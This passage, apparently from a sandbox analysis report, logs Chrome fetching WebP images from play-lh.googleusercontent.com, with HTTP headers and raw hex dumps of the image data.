                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC1390INData Raw: 1b 62 0f 95 a2 24 cf 6c 63 58 8f 47 32 19 44 71 10 e5 1d 7a d1 32 bc c5 75 86 65 65 1f a0 ef bd 63 bd 68 79 63 02 ae f5 f8 68 f1 98 c3 04 5d 2a 1d c9 5a 6a 5b a8 db f3 39 a7 d8 66 d9 b0 01 c8 ff e9 95 38 45 f5 9d 94 d5 c8 9f 6f 28 af 31 e1 a3 85 e2 83 7e 18 b8 43 b5 91 47 b5 33 ff 48 4e 60 98 ed 19 1d 13 fd 2b fd ae 8d 0e a5 1b 89 fb c9 c4 e0 78 7a 20 d3 ad 82 5b e7 2b 88 ac 37 13 e4 df 86 59 07 a5 f6 c1 46 42 c9 ff 8d 48 e0 4c b9 4c d7 36 29 9c fd 26 6f 8a c9 e6 f5 b1 69 8a 94 87 13 05 c7 1b 70 be 14 85 5b ed 34 08 6a 87 ee b2 41 7e d5 9f a9 40 5f d6 d8 7e 8d eb a9 39 17 29 f6 32 be fa 1b 68 31 c4 f0 16 87 dd e1 8d 05 4b ee 69 ac 5f 69 f6 62 72 4c ca b1 34 b3 8e 44 f5 7a 9a bf 48 d6 1c c5 dd ec 69 b4 cc ae 69 63 d9 6a c8 7e 9c 77 ae 86 f3 44 12 b1 2a 18
                                                                                                                                                                                                                                Data Ascii: b$lcXG2Dqz2ueechych]*Zj[9f8Eo(1~CG3HN`+xz [+7YFBHLL6)&oip[4jA~@_~9)2h1Ki_ibrL4DzHiicj~wD*
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC1390INData Raw: b2 f5 59 d1 ba fe 05 d9 ce 19 b7 a6 65 d3 c3 62 6c e2 d7 8f 5b fb ce 72 b6 08 3a 95 ff f1 2d 50 d6 fe 68 fc 37 88 e0 c7 cf 50 41 a6 31 a7 c3 c5 fa 63 bd 7c 92 9e 3f 09 ee f8 8a 34 2a b9 e6 14 12 6c ff 75 a0 7f 73 29 d7 e3 04 f2 2b b1 25 71 ae b4 35 34 9c b3 de ed c3 2f 63 da e0 b5 ad 1b 68 fc af 52 c5 59 76 51 cc 2d 1d bd c9 33 de fb 78 1a 4d d1 97 aa 07 dc cb ff 94 a0 fd 02 33 b9 d0 be 88 c5 f7 a2 7b 03 fe 24 b9 f7 1f b5 d4 d5 d2 26 63 6f 4f 66 07 5c 59 cb 4d 31 a7 ec a2 c1 81 55 a5 63 c6 92 1e 17 1f 37 b2 e4 05 60 9e 41 b0 de 2e 65 ee 19 e1 d3 48 2d f6 95 0e 86 3e 1c e5 e0 c8 fe 67 06 54 3a b2 2a 62 83 a4 ee 6a e3 30 4e 64 7a 97 e6 a5 ed b6 42 c5 df 70 75 27 b0 49 76 c5 9f 35 48 32 0f a6 cb 32 d6 b8 8c a1 ef 54 6d 35 36 0e 39 49 97 39 3d c4 87 9b 51 f0
                                                                                                                                                                                                                                Data Ascii: Yebl[r:-Ph7PA1c|?4*lus)+%q54/chRYvQ-3xM3{$&coOf\YM1Uc7`A.eH->gT:*bj0NdzBpu'Iv5H22Tm569I9=Q
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC1390INData Raw: 24 3a d0 23 87 af 11 c4 1e 58 fc bb 21 34 e7 20 66 99 d2 b8 c3 7c 00 b9 50 4e 8a 1c 99 bd 5b b6 2d ce ef 71 69 bd da e0 f0 73 b3 19 22 1d 6f 17 b3 cf 5c 26 5f f4 a8 28 9e f7 27 ce c7 96 34 f9 97 fc 0d 9d 1e 72 cc 4c 0b 28 17 f9 d0 48 42 eb ad 18 9b 9d f0 29 a7 59 67 ae 6b f6 63 57 9a ca bc ab 29 e0 43 cc 3e 48 78 5f 2b 5a b3 d1 86 35 7d 48 dd 30 a8 23 61 15 f6 93 eb df 63 87 97 a7 c3 fb 6b d9 ee a3 81 94 fc 77 ba 38 ac 85 bf 91 a9 45 51 b4 a8 12 c5 4a b5 05 59 b6 10 5d b5 f3 52 e1 13 93 f4 2f 8c 8a 7f f3 7d 39 43 a1 24 d1 05 8d 3d 58 5f 13 cc 27 04 b5 02 94 d8 3c 99 49 10 d7 6d 7b 17 dc 14 7f 9f fb 61 51 93 c2 c0 03 88 a3 ce 1f 3c 33 fa 57 3a 40 25 ca 65 65 44 91 a4 f5 6e 2c 9a e7 81 92 7d 53 fe f9 71 ea c7 63 44 fb 08 16 3b 58 24 a1 da 44 b4 a1 fa a4 8c
                                                                                                                                                                                                                                Data Ascii: $:#X!4 f|PN[-qis"o\&_('4rL(HB)YgkcW)C>Hx_+Z5}H0#ackw8EQJY]R/}9C$=X_'<Im{aQ<3W:@%eeDn,}SqcD;X$D
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC1390INData Raw: be 22 a5 ac 2f 2e 08 e0 a5 b9 31 8b f5 6c a1 b5 8a a8 da 33 2e 5a ab 8f 4f 9b 47 27 e8 dc 3e c1 64 65 93 bd fe 60 41 c0 e5 8c 19 ee c8 2c 66 44 39 5e 95 03 4d 77 6c 98 df 4f ee bf ed 9a 46 d2 e3 99 90 92 73 c7 e8 0b 76 96 5f 54 fc 10 46 dd 4b a6 7d 32 f5 18 aa f7 92 e8 6b ba a7 63 eb 8d 37 69 68 db 3c 1c 45 76 c3 84 13 7e 9e 99 ef b9 6a 35 ae 57 55 c4 75 be a0 a8 5d 48 c4 e2 0b 65 d2 f5 d5 30 e8 4a b4 b6 cb 19 b5 a9 46 68 72 af 5f f0 71 33 ac 2a a0 f3 7c d9 0b 5a 32 2c 9c 9c 3d 1e 2e 77 88 8c 41 13 c2 82 2c 44 bd c1 3a 2b ea 92 80 95 01 c4 2f b4 0b ac da 4f 86 60 ef 07 d2 ac ec 87 c3 f6 77 c3 0d 0e 51 4d 00 26 3a b9 e0 89 5a ad 2c bb 70 70 9e 78 ea f3 6a 6b 4b 8e 8c ad 7d aa 0f 40 5e 7d 94 f4 2b 8d 6d ab 7e 8c fb 54 b2 75 c6 65 eb 79 51 e8 d9 6d 32 67 8c
                                                                                                                                                                                                                                Data Ascii: "/.1l3.ZOG'>de`A,fD9^MwlOFsv_TFK}2kc7ih<Ev~j5WUu]He0JFhr_q3*|Z2,=.wA,D:+/O`wQM&:Z,ppxjkK}@^}+m~TueyQm2g
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC1390INData Raw: 67 40 b9 fa 11 af 67 f5 12 93 de 1b 85 60 a2 96 90 dc 05 89 b2 d8 47 53 eb b9 28 ac f2 fb ff d2 6a b4 e1 ae 3c a2 6d 49 94 82 16 fc f3 41 2a cc 61 91 aa 46 bf 51 9d f4 b9 15 88 80 11 fb 9e c4 f5 c4 b6 b4 46 4b d7 2a f5 5f 14 b6 4a 7e 3c a6 9f 5c 60 c6 0a e0 a0 a9 19 fe 29 4d c3 57 27 bd 14 a7 f5 24 df 41 7a c7 b1 80 c4 96 08 5e ad 82 24 a9 c3 49 17 6f b7 23 9c 8d 60 50 f1 c4 9a ef 6f 69 0b cc 56 d5 20 89 f4 bc 20 b8 40 22 72 d3 1e e6 07 8a 74 8a e5 1a 67 72 5e 6d 2b 15 34 5b 46 01 ec 42 6f 17 01 00 6f 40 98 57 d8 05 74 fd b3 02 32 1d 4d e0 50 fd 73 de a9 eb 45 00 51 a0 cd f4 e5 81 ac 42 7e e8 0a 4a df 16 4c c3 df f7 21 f7 1a a0 f1 da b5 87 2b 22 f5 fb 22 13 af b7 ca 48 3e 9b 7b 80 88 d5 86 ce 31 af 88 85 4d b4 6e 2d b2 30 2e 75 71 df 5c 44 83 bd 80 97 58
                                                                                                                                                                                                                                Data Ascii: g@g`GS(j<mIA*aFQFK*_J~<\`)MW'$Az^$Io#`PoiV @"rtgr^m+4[FBoo@Wt2MPsEQB~JL!+""H>{1Mn-0.uq\DX


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                98192.168.2.449986142.250.185.2144432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC1092OUTGET /VRMWkE5p3CkWhJs6nv-9ZsLAs1QOg5ob1_3qg-rckwYW7yp1fMrYZqnEFpk0IoVP4LM=s52-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                                                                                                sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://play.google.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC531INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 2956
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:53:45 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 04:53:45 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 56
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC859INData Raw: 52 49 46 46 84 0b 00 00 57 45 42 50 56 50 38 4c 78 0b 00 00 2f 33 c0 0c 00 09 33 6d db a8 ed 4e f3 67 3c 0e 11 fd 4f 08 46 0e cb 15 d5 d2 44 b9 24 fe 82 6d 24 49 4e fa 05 5a 6b 4c f2 8f 8e 08 70 49 81 6d 23 49 8a 2a ff 38 8f d9 bc 07 43 40 92 48 ff 3f d7 ff 04 f2 e1 17 7f 0a 80 4a d0 7b 34 76 6a 56 af ed f9 dc 82 8f 92 e7 32 dc ff 2f 00 5c c0 1d e0 cf e0 69 db b6 63 af 68 5b db af e7 55 4b 5a ba 6d db 76 ef 35 0c 95 6c 1b 25 db b6 6d 54 6d 1b dd b6 ed de 9b d3 92 f7 7d 9f ab 90 74 fc 84 f3 a6 24 db b6 dd 48 59 e7 3e 49 99 05 d4 a7 4b d0 63 7e cc bf 48 49 ef 78 a2 6d db b4 6d 6b db 72 ed 63 ee 75 b7 f7 be b6 6d db 76 e8 a6 1b b2 7d 6f f4 44 af 6f d8 b6 11 b4 6d db 36 1e 6c ad 39 e7 50 6f 31 01 b7 fe af 44 83 1e 1d e8 98 63 64 ec c7 3c 8c 98 58 cd e2 28 47
                                                                                                                                                                                                                                Data Ascii: RIFFWEBPVP8Lx/33mNg<OFD$m$INZkLpIm#I*8C@H?J{4vjV2/\ich[UKZmv5l%mTm}t$HY>IKc~HIxmmkrcumv}oDom6l9Po1Dcd<X(G
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC1390INData Raw: ec 2e f5 ac 35 2c d8 a5 9e e3 a8 e9 54 e8 83 50 21 20 14 09 45 10 12 0a 2c 2f bf ef ff 08 9b 59 4d 86 1f 5e f3 f7 9c 9f 61 f7 5c 6d c7 22 79 6d a6 af be de c3 c8 96 80 82 bf 68 49 d9 5d ba d2 ba cf 73 14 13 2f f9 38 23 2b 2b 7d b0 50 24 48 28 d6 80 a2 25 41 98 fa ff 47 6d d3 b1 48 5e 96 e9 b1 d7 c7 39 7c f1 fd e8 29 c1 56 1e 72 bd 81 85 2d 05 1a e5 8f 09 5a 20 94 b4 cd dd b6 b2 e0 35 2b 34 0a 14 61 61 1e 83 91 4b df 7f 3f f1 ff ef c7 de 5b 1d 09 ae 25 6f b5 f9 fb 5c fe fb df db 70 c0 cc e1 a5 fb 61 73 60 95 f6 b7 c9 63 af 8f b0 bc 6e 76 93 b4 6c da 38 60 64 22 a0 88 35 99 32 84 16 3e bf df f1 75 20 c8 3b 66 09 28 42 31 33 0d 0e bf 79 fd ec 1b 5d 7a 12 77 a0 09 2a 19 53 f2 91 e4 c7 72 65 46 a6 2f 99 df a9 49 5e 17 f5 f1 81 4f bb 3e cc fc 0e 13 81 f8 a2 fe
                                                                                                                                                                                                                                Data Ascii: .5,TP! E,/YM^a\m"ymhI]s/8#++}P$H(%AGmH^9|)Vr-Z 5+4aaK?[%o\pas`cnvl8`d"52>u ;f(B13y]zw*SreF/I^O>
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC707INData Raw: c3 ce d1 ad 63 5b 07 5b 9b 53 1b 90 92 2c 58 cb 25 b6 8a c3 87 ef a3 33 13 6f 9d 85 2b 82 9c 3d ef 90 7f 9f af 2c 84 9a 0c 5f fc 7e 6c e6 80 31 90 f3 b2 63 6c 19 5b c3 a9 a3 29 ad a4 85 94 36 c9 46 3e e8 27 7f f5 fe df 92 66 92 ff 9c 91 53 e7 ad 41 0a 14 1b fe 74 9e 75 6a 2a d9 59 9e f2 3e f2 49 7d 51 73 5e ce 1b 5b 4e 49 5a 67 28 47 68 68 f5 66 7f fc a1 fd f2 4f 7d 4f 6f 29 39 e5 ab e6 8e 9c 38 07 6b 0a 14 0d 8a 0d 9f bc 5f bf ee 41 2b e4 3e fb 8e 47 4c 2c 29 d0 24 7b 66 76 ec 19 5b c6 29 39 e1 26 c7 5c e7 0a 6f e1 7d fc cd fb b1 4f 7e 1f b9 3d 96 95 cd b2 c3 6f 9d ef e6 2e fc 17 04 24 59 83 a2 29 9a 62 cd 8a 07 ec 3b 77 20 33 8f 7a 1f fe e9 cf 0f 3f 90 5f 5d cd 5f 4f 72 e1 c4 ff ec 6c 67 7d cf ac ef f5 3d d9 b1 97 bd 36 6b 7b ad 1c df b8 e2 85 9e b9 83
                                                                                                                                                                                                                                Data Ascii: c[[S,X%3o+=,_~l1cl[)6F>'fSAtuj*Y>I}Qs^[NIZg(GhhfO}Oo)98k_A+>GL,)${fv[)9&\o}O~=o.$Y)b;w 3z?_]_Orlg}=6k{


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                99192.168.2.449985142.250.185.2144432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC1097OUTGET /xNx9CfCzg_VugRMv3rIxVd-GjLRx6_dIXGfTlrKqJwkZCPg_w-ZZNosQT46MYIoo_Q=w526-h296-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                                                                                                sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://play.google.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 12738
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 5898
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC856INData Raw: 52 49 46 46 ba 31 00 00 57 45 42 50 56 50 38 20 ae 31 00 00 b0 9b 00 9d 01 2a a6 00 28 01 3e 65 28 90 45 24 22 a1 97 5b c6 88 40 06 44 b5 00 68 65 19 7f 73 fc 8c ed d8 fa 1d f7 fb 6f ec ff e6 77 cc 85 89 fc 0f f7 9f d3 bc ab 55 57 96 df 3a 7f bf ff 1d f9 17 f3 2b fd 27 fb cf ef 1e eb 7f 41 ff cc f7 03 fd 4a ff 8f fd 97 fb f7 64 3f dc ef 50 7f d2 7f cf 7e db fb bb ff af fd 96 f7 85 fd f3 d4 0f fa 9f f9 cf 5b ff f8 1e c8 ff e0 bf da 7f ff f7 03 fe 81 fe ab d3 57 f6 e7 e0 fb fb 07 fb bf db df 81 6f d9 cf ff 5e c0 1f f8 bd 40 3f ee 71 40 7f 65 f4 5d e0 cf e2 bf 2b fc f3 f2 6d ea ff 70 7d 88 72 4f da 47 fa 5e 88 ff 33 fb d3 fb af f0 5f ba 1f 14 ff a0 ff 73 e1 7f ca 9f ee fd 42 3f 22 fe 7b fe 5b f3 3f ca c7 ba b2 dc 7a 05 fb 31 f5 3f f6 df de 7f 77 ff d9 7c 2e
                                                                                                                                                                                                                                Data Ascii: RIFF1WEBPVP8 1*(>e(E$"[@DhesowUW:+'AJd?P~[Wo^@?q@e]+mp}rOG^3_sB?"{[?z1?w|.
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC1390INData Raw: 41 f7 43 3b 0d 9f 22 b1 63 49 bc 22 a7 bb 7e b9 a7 bb 0c 0f 8a 93 d8 8c 74 6c 5d f6 10 72 3c 5e 09 db ec c4 4e 4f 33 ba 2d 03 c5 2e 5e 79 d8 f3 9c 6f 21 a9 01 b2 51 80 14 d5 cb 74 c7 2c b2 45 10 fb 8d 8b ee b4 7e 54 56 d1 17 97 ec dd cd 79 0e 3a ce 37 55 0d c4 a5 82 69 bb 6b 3a cb 85 a2 71 86 f1 96 41 7d 94 df 9a 1c 8f 3b a7 d6 0a 0e 89 a4 5c dc 61 40 65 69 c7 0d 49 9e ff 3c 47 5f 40 18 6c cb a8 56 a3 69 66 96 08 ca 2b f4 6b ac d8 4c 9d d3 78 6b 97 8a 4e 64 c9 46 ed 2c ee 00 67 2d 0e a4 dd ed dd 50 7d 96 aa 51 b4 53 33 0f 3e a1 14 2e 4a 4a cf 6e 32 99 8a 47 80 81 cb 96 0b 20 9b a2 67 5c 18 42 78 ef b5 5f 42 7f 5f c6 02 1e 46 a0 c3 d7 fb 06 61 65 ab 8e b9 0d 70 ef a7 9f 3f 45 03 32 d7 f9 a4 8c ce 19 1e 2a 88 f2 b3 21 83 7c 3a 2b 90 dd 54 a1 2f ee 7d fe 76
                                                                                                                                                                                                                                Data Ascii: AC;"cI"~tl]r<^NO3-.^yo!Qt,E~TVy:7Uik:qA};\a@eiI<G_@lVif+kLxkNdF,g-P}QS3>.JJn2G g\Bx_B_Faep?E2*!|:+T/}v
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC1390INData Raw: c0 5b c9 56 d0 51 48 a2 65 9b f2 90 7c de 4d ce 82 26 06 df f7 d2 f3 42 97 9f 8d 6f 20 a1 85 27 fe 1d d7 b9 6b 05 60 ce b4 71 f1 b1 b6 a3 65 18 9c 62 29 c1 38 89 52 17 81 44 dd 90 4f 96 3b 8e a9 cb 70 5a bc 3f d2 a2 ef 83 82 f7 28 b4 db 2a ae ab 85 b0 2a 87 bd 6f 7b f4 27 0d 2d 9b 7a 9a 06 9c 5d 1b 93 83 89 84 ff 07 56 3c f1 0c a2 84 9e 91 f3 7e 5d 84 e2 11 65 89 da 21 15 ef c9 d8 2d a6 0c 08 f6 9e 93 aa 35 b9 59 5a 92 0d 54 4a ba 11 55 dc e4 ed 64 9d 44 b8 7f 07 72 91 91 8f 87 06 4c 39 8b 38 8e 2e 0d 8a 01 fa 58 98 be cf 1b 5a 7e 9f f2 ac 9a 0f d3 a2 bc 23 84 87 96 65 ae 69 6f dd 29 a1 8c 80 33 e4 a4 96 5e b8 ab c7 ee d8 ee 45 d6 3d ea 9c a7 68 66 d9 c2 ed 2a b5 d8 e4 dd e4 9a 44 bf da c0 87 bb 5b 0a d6 21 77 63 b5 00 c8 26 68 da 90 db 25 77 31 2a 5e 8a
                                                                                                                                                                                                                                Data Ascii: [VQHe|M&Bo 'k`qeb)8RDO;pZ?(**o{'-z]V<~]e!-5YZTJUdDrL98.XZ~#eio)3^E=hf*D[!wc&h%w1*^
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC1390INData Raw: cc b0 69 5c 44 1f f3 f8 e6 2f 9d 81 d1 ed 9f 2a c2 62 9b 29 d8 a7 6f 82 bf d7 0e 70 f7 61 b4 a0 66 ef 1f 48 49 ea cb 60 22 9a fb 10 e8 9d f3 6c e8 af b0 d8 c1 0b c9 fe 73 99 28 0e a5 19 88 52 89 f2 6a fc 60 d4 35 57 30 6e 2c eb 3d b2 f8 fe d9 1c 53 1e 56 7b ff 9a a8 8b 7a 98 c1 db 1e 96 25 1b bd 7d c0 db d0 c2 5a 92 07 d5 7a 06 ef bf 9f 26 ec a6 ee 2c f9 d5 c4 92 52 2b 21 c0 26 3e 02 97 14 dd 4f 98 d2 6f 1e 3e 23 72 47 97 c1 ed 43 3d b6 53 be f1 05 56 f6 2a 40 3c e1 08 ca 44 52 db ff 23 fe 58 24 32 d9 f7 d4 93 fe ed f8 d3 12 df 33 90 96 bf 2f c8 9e ba 12 57 1a be 37 c0 65 2c 63 fc 3b 96 8a be 83 68 31 c4 3f d1 9b 6c 42 ef 34 c6 59 48 42 12 ff 49 3c b1 a1 6e 48 0f 8e e3 64 8c a5 89 59 a4 19 09 f4 c3 d1 84 30 4c 04 59 e5 b5 56 0c 8b a3 d8 2b 81 73 8d a2 fc
                                                                                                                                                                                                                                Data Ascii: i\D/*b)opafHI`"ls(Rj`5W0n,=SV{z%}Zz&,R+!&>Oo>#rGC=SV*@<DR#X$23/W7e,c;h1?lB4YHBI<nHdY0LYV+s
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC1390INData Raw: b1 23 1f c5 60 5e 1a 90 3a 3b 9f c3 cb 2f 5a d0 0c a1 11 01 ae cc e4 44 e1 36 63 e2 1f 95 fa 4f dd 8c 8b f7 84 9d 35 b1 a7 fb 79 ae f1 8c d8 f0 6e 9e ac dc d4 f4 38 f3 c7 b7 43 d8 a0 06 84 95 86 4f a6 ad b2 25 dd 4c b5 68 0c 3f 2f 9e ec c7 37 ca a6 63 8c 2a 17 e7 28 f8 67 98 55 cc e2 e2 3d 7d 76 26 68 4b 00 64 c5 8f f0 b6 3d c2 23 73 00 fc 6d e6 1d e4 de db 25 98 eb 3d f8 d7 c8 e5 91 2a 42 43 68 ff 67 3b e1 0b 80 6c 6e d3 c3 82 ed 47 16 37 df 3b 1f 90 76 25 d6 e3 b4 2f 51 d0 11 84 8b ab 21 0c aa 20 62 ea 2b 9c de fe 02 f3 34 ec 2b ba 23 2f 56 7d cf 99 31 ff c9 9d a2 4b 5b 06 fc 88 4e ac 15 05 b0 a9 af b9 80 42 7c 72 6b 78 e4 31 ae 0a 8d dd ba c4 88 d6 09 5d 7c 24 bf ae 07 cb 17 72 cf a9 1e f5 ba ab 98 79 f1 1d 55 ef f4 b8 b1 99 14 8b 5e 05 cf 68 4a 42 37
                                                                                                                                                                                                                                Data Ascii: #`^:;/ZD6cO5yn8CO%Lh?/7c*(gU=}v&hKd=#sm%=*BChg;lnG7;v%/Q! b+4+#/V}1K[NB|rkx1]|$ryU^hJB7
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC1390INData Raw: 19 04 dd 5f 3e 5d e0 1f 0c 84 3d 56 b9 79 9a e1 72 c1 af fa d8 b3 b8 37 27 81 0d 80 e8 c9 08 64 70 83 b9 53 d9 e6 cf a7 14 ca b5 10 1d 17 45 03 94 8d 62 5b 57 5b 27 02 59 2b 70 d9 32 7c c6 9d 19 76 b2 ff d0 41 27 2b 22 92 10 40 99 52 ab ec b7 f1 c0 cf 73 04 7f 00 28 ae 13 43 62 4f 6d 0f 07 de 49 05 a9 b4 7a d1 5a 36 bc 6b 01 13 60 0d 4e 9e 89 dd 59 ea 03 8b 30 57 e5 08 a1 d7 fb da b9 d3 00 b9 36 8e e4 f7 b0 22 f5 66 3c 8c 5b 1a 9c f3 e6 37 b2 ff c9 a4 dd 51 31 6b d0 84 9b 8b 2f a3 52 95 aa cd 62 e0 cd 6d 63 d2 d7 2b c2 08 d9 8b 87 f2 15 50 26 9a b8 f3 cf 04 6f ac 6a 0e 4e 0c d9 4a b4 66 35 17 41 12 10 6d e4 b4 bd af 07 08 ff 1d 63 54 df 3d 51 3b 34 8f 57 ac 15 a7 fa 2b b3 d1 9b 4a d3 81 b6 d1 e3 0f 5d e8 d3 80 92 07 3d 2e 16 3a 2d bb ca 32 c2 e7 9b 8f e0
                                                                                                                                                                                                                                Data Ascii: _>]=Vyr7'dpSEb[W['Y+p2|vA'+"@Rs(CbOmIzZ6k`NY0W6"f<[7Q1k/Rbmc+P&ojNJf5AmcT=Q;4W+J]=.:-2
